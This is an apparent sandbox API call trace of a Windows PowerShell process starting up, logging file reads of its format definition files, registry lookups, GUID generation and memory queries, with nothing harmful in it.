	[0521.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.770] CoTaskMemFree (pv=0x30ac60) 
	[0521.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.771] SetErrorMode (uMode=0x1) returned 0x1
	[0521.771] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0521.771] GetFileType (hFile=0x2f4) returned 0x1
	[0521.771] SetErrorMode (uMode=0x1) returned 0x1
	[0521.772] GetFileType (hFile=0x2f4) returned 0x1
	[0521.772] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.774] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.774] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.774] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.775] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.775] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.775] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x9e2, lpOverlapped=0x0) returned 1
	[0521.775] ReadFile (in: hFile=0x2f4, lpBuffer=0x3339632, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3339632*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0521.775] ReadFile (in: hFile=0x2f4, lpBuffer=0x333a0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x333a0e8*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0521.775] CloseHandle (hObject=0x2f4) returned 1
	[0521.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.776] SetErrorMode (uMode=0x1) returned 0x1
	[0521.776] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecd60 | out: lpFileInformation=0xecd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0521.776] SetErrorMode (uMode=0x1) returned 0x1
	[0521.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x2f4) returned 0x0
	[0521.776] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0521.776] CoTaskMemAlloc (cb=0x5a) returned 0x1b844540
	[0521.776] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x1b844540, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0521.776] CoTaskMemFree (pv=0x1b844540) 
	[0521.776] RegCloseKey (hKey=0x2f4) returned 0x0
	[0521.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0521.783] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x8fd45ceb, Data2=0x10bc, Data3=0x497b, Data4=([0]=0x84, [1]=0x58, [2]=0x2a, [3]=0xd0, [4]=0x60, [5]=0x2c, [6]=0x88, [7]=0xef))) returned 0x0
	[0521.786] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xfce36f72, Data2=0x818e, Data3=0x4bfa, Data4=([0]=0xb9, [1]=0x48, [2]=0x83, [3]=0x95, [4]=0xe3, [5]=0x8c, [6]=0x16, [7]=0x54))) returned 0x0
	[0521.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0521.788] SetErrorMode (uMode=0x1) returned 0x1
	[0521.788] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0521.788] GetFileType (hFile=0x2f4) returned 0x1
	[0521.789] SetErrorMode (uMode=0x1) returned 0x1
	[0521.789] GetFileType (hFile=0x2f4) returned 0x1
	[0521.789] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.790] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.790] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0521.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0xfb2, lpOverlapped=0x0) returned 1
	[0521.792] ReadFile (in: hFile=0x2f4, lpBuffer=0x336436a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x336436a*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0522.915] ReadFile (in: hFile=0x2f4, lpBuffer=0x3364c50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3364c50*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0522.915] CloseHandle (hObject=0x2f4) returned 1
	[0522.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0522.916] SetErrorMode (uMode=0x1) returned 0x1
	[0522.916] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecd60 | out: lpFileInformation=0xecd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0522.916] SetErrorMode (uMode=0x1) returned 0x1
	[0522.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0522.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x2f4) returned 0x0
	[0522.916] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0522.916] CoTaskMemAlloc (cb=0x5a) returned 0x1b844540
	[0522.916] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x1b844540, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0522.916] CoTaskMemFree (pv=0x1b844540) 
	[0522.916] RegCloseKey (hKey=0x2f4) returned 0x0
	[0522.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0522.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0522.918] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x78240467, Data2=0xdca4, Data3=0x4006, Data4=([0]=0x90, [1]=0x38, [2]=0xbe, [3]=0xd8, [4]=0x7f, [5]=0x1f, [6]=0x4f, [7]=0x38))) returned 0x0
	[0522.923] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x8b1852da, Data2=0x49d1, Data3=0x4957, Data4=([0]=0xa3, [1]=0xea, [2]=0x5a, [3]=0xef, [4]=0x8f, [5]=0x1f, [6]=0x8f, [7]=0x6b))) returned 0x0
	[0522.924] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x1aae89c3, Data2=0x450e, Data3=0x4b25, Data4=([0]=0x80, [1]=0x65, [2]=0xeb, [3]=0x1d, [4]=0xd2, [5]=0xde, [6]=0x8c, [7]=0xe6))) returned 0x0
	[0522.925] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xfbdead6f, Data2=0x46e0, Data3=0x4bf6, Data4=([0]=0x9b, [1]=0x25, [2]=0xd2, [3]=0x64, [4]=0x9a, [5]=0x70, [6]=0xc9, [7]=0xa1))) returned 0x0
	[0522.926] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xebad8f13, Data2=0x60d9, Data3=0x44d6, Data4=([0]=0x81, [1]=0x68, [2]=0x7b, [3]=0x84, [4]=0xfc, [5]=0xa8, [6]=0xad, [7]=0xde))) returned 0x0
	[0522.926] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x13ec18e, Data2=0xdb01, Data3=0x4e80, Data4=([0]=0x9f, [1]=0x7b, [2]=0xbf, [3]=0x6b, [4]=0xcb, [5]=0x8a, [6]=0x1f, [7]=0x91))) returned 0x0
	[0522.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.927] SetErrorMode (uMode=0x1) returned 0x1
	[0522.927] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0522.927] GetFileType (hFile=0x2f4) returned 0x1
	[0522.927] SetErrorMode (uMode=0x1) returned 0x1
	[0522.928] GetFileType (hFile=0x2f4) returned 0x1
	[0522.928] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0522.929] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0522.930] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0522.930] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0522.931] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0522.931] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0522.931] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0xaca, lpOverlapped=0x0) returned 1
	[0522.931] ReadFile (in: hFile=0x2f4, lpBuffer=0x33affe2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33affe2*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0522.931] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b09b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x33b09b0*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0522.931] CloseHandle (hObject=0x2f4) returned 1
	[0522.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.932] SetErrorMode (uMode=0x1) returned 0x1
	[0522.932] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecd60 | out: lpFileInformation=0xecd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0522.932] SetErrorMode (uMode=0x1) returned 0x1
	[0522.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.932] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x2f4) returned 0x0
	[0522.932] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0522.932] CoTaskMemAlloc (cb=0x5a) returned 0x1b844540
	[0522.932] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x1b844540, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0522.932] CoTaskMemFree (pv=0x1b844540) 
	[0522.933] RegCloseKey (hKey=0x2f4) returned 0x0
	[0522.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0522.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0522.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0522.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.944] VirtualQuery (in: lpAddress=0xeb8e0, lpBuffer=0xec7a0, dwLength=0x30 | out: lpBuffer=0xec7a0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.945] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xa555fb79, Data2=0x4e1f, Data3=0x43ad, Data4=([0]=0xb4, [1]=0x6c, [2]=0xc6, [3]=0xfc, [4]=0x63, [5]=0x48, [6]=0xd9, [7]=0xe7))) returned 0x0
	[0524.946] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6c4f8520, Data2=0x75b0, Data3=0x4189, Data4=([0]=0xa5, [1]=0xfa, [2]=0xc8, [3]=0xc3, [4]=0x82, [5]=0x2e, [6]=0xf4, [7]=0x1f))) returned 0x0
	[0524.947] VirtualQuery (in: lpAddress=0xeba90, lpBuffer=0xec950, dwLength=0x30 | out: lpBuffer=0xec950*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.948] VirtualQuery (in: lpAddress=0xeba90, lpBuffer=0xec950, dwLength=0x30 | out: lpBuffer=0xec950*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.949] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x2bbd8b6d, Data2=0x5849, Data3=0x41f4, Data4=([0]=0xa0, [1]=0x59, [2]=0x98, [3]=0xdb, [4]=0x99, [5]=0x2e, [6]=0xeb, [7]=0xc6))) returned 0x0
	[0524.952] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x82d06aac, Data2=0x8b76, Data3=0x433a, Data4=([0]=0x86, [1]=0xab, [2]=0x8d, [3]=0xb, [4]=0x9b, [5]=0x0, [6]=0x23, [7]=0xa4))) returned 0x0
	[0524.953] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.954] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x22e6e26b, Data2=0x64ab, Data3=0x4cdd, Data4=([0]=0xbc, [1]=0x48, [2]=0x3e, [3]=0xbe, [4]=0x1c, [5]=0xab, [6]=0xad, [7]=0xe6))) returned 0x0
	[0525.947] VirtualQuery (in: lpAddress=0xebb00, lpBuffer=0xec9c0, dwLength=0x30 | out: lpBuffer=0xec9c0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0525.948] VirtualQuery (in: lpAddress=0xeb350, lpBuffer=0xec210, dwLength=0x30 | out: lpBuffer=0xec210*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0525.949] VirtualQuery (in: lpAddress=0xeb350, lpBuffer=0xec210, dwLength=0x30 | out: lpBuffer=0xec210*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0525.950] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xdf0607a7, Data2=0xde58, Data3=0x4bb7, Data4=([0]=0xa3, [1]=0x4f, [2]=0x9b, [3]=0x64, [4]=0xdd, [5]=0xe8, [6]=0xfc, [7]=0x3b))) returned 0x0
	[0525.951] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x5c5c4fbd, Data2=0x78f8, Data3=0x48ef, Data4=([0]=0x99, [1]=0xb, [2]=0x3e, [3]=0xc0, [4]=0x84, [5]=0x49, [6]=0x45, [7]=0x86))) returned 0x0
